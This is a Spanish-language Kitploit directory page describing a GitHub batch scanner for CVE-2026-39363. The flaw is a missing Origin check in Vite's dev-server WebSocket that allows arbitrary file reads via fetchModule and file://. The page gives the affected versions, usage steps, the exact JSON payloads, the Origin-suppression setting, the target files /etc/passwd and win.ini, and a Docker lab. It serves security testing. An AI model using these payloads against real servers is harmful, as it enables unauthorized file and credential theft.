Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39363 — Escáner de vulnerabilidades por lotes para CVE-2026-39363 en el servidor de desarrollo de Vite, que explota la omisión de validación de origen de WebSocket para leer archivos arbitrarios mediante fetchModule con el protocolo file://. | Kitploit
Herramientas/GitHubGitHub/f4s1on/cve-2026-39363
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

Escáner de vulnerabilidades por lotes para CVE-2026-39363 en el servidor de desarrollo de Vite, que explota la omisión de validación de origen de WebSocket para leer archivos arbitrarios mediante fetchModule con el protocolo file://.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39363 — Detección masiva de lectura arbitraria de archivos en Vite Dev Server WebSocket

Descargo de responsabilidad: Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas e investigación educativa. Los usuarios deben cumplir con las leyes y regulaciones locales; escanear o atacar sistemas de terceros sin autorización es ilegal. El autor no se hace responsable de ningún uso indebido.

Descripción de la vulnerabilidad

El servidor de desarrollo de Vite (6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4) no valida el encabezado Origin en su WebSocket HMR. Un atacante puede invocar fetchModule a través del evento vite:invoke, utilizando el protocolo file:// junto con el parámetro ?raw para eludir la restricción server.fs.allow y leer archivos arbitrarios del servidor.

Flujo de detección

root@kitploit:~
url.txt → http://host:port
  ↓ analizar host + port
  ↓
┌─ Paso 1: intentar ws://host:puerto_dado
│  ├─ Handshake WebSocket exitoso + exploit exitoso → vulnerable
│  └─ fallo → si el puerto dado == 5173 → no vulnerable
│
└─ Paso 3: probar host:5173 (solo si el puerto dado ≠ 5173)
   ├─ puerto cerrado → no vulnerable
   └─ puerto abierto → handshake WebSocket + exploit en 5173
        ├─ éxito → vulnerable
        └─ fallo → no vulnerable

Uso

Instalar dependencias

root@kitploit:~
pip install -r requirements.txt

Activar y desactivar el proxy

Para activar el proxy, descomenta las líneas 26-27 del script

root@kitploit:~
# Para activar el proxy, descomenta las dos líneas siguientes y configura la dirección y el puerto del proxy correctos
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

Preparar los objetivos

Escribe las URL de destino en url.txt, una por línea:

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

Ejecutar

root@kitploit:~
python cve_2026_39363.py

Salida

Terminal:

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

Cada línea contiene el tipo de POC (Linux / Windows), que identifica las características del archivo leído correctamente.

Archivos de verificación POC

Sistema objetivoArchivo leídoMarcador característico
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Payload del exploit

Se admiten dos formatos de payload (se intentan en orden):

  1. Formato PoC de Vulhub: {"id":"send:0","name":"fetchModule","data":[file_path]}
  2. Formato RPC interno: {"fn":"fetchModule","args":[file_path]}

Parámetros clave del WebSocket

ParámetroValorMotivo
Subprotocolovite-hmrRequisito del WebSocket HMR de Vite
OriginSupresión de envío (suppress_origin=True)Vite rechaza conexiones no provenientes de navegador con encabezado Origin

Prueba del entorno vulnerable con Docker

root@kitploit:~
# Iniciar
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# Escanear
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# Limpiar
docker stop vite-vuln && docker rm vite-vuln

Preguntas frecuentes

P: ¿Todas las detecciones devuelven "no vulnerable"?

  • Confirma si el puerto 5173 del objetivo está abierto
  • Confirma que el servidor de desarrollo de Vite está expuesto a la red mediante --host o server.host
  • Confirma que WebSocket no está deshabilitado con server.ws: false

P: ¿Salida corrupta en Windows?

  • El script lo maneja automáticamente; si el problema persiste, confirma que la terminal use codificación UTF-8

P: ¿El url.txt generado en PowerShell no se puede analizar?

  • El script usa utf-8-sig para omitir automáticamente la BOM
Descargar herramienta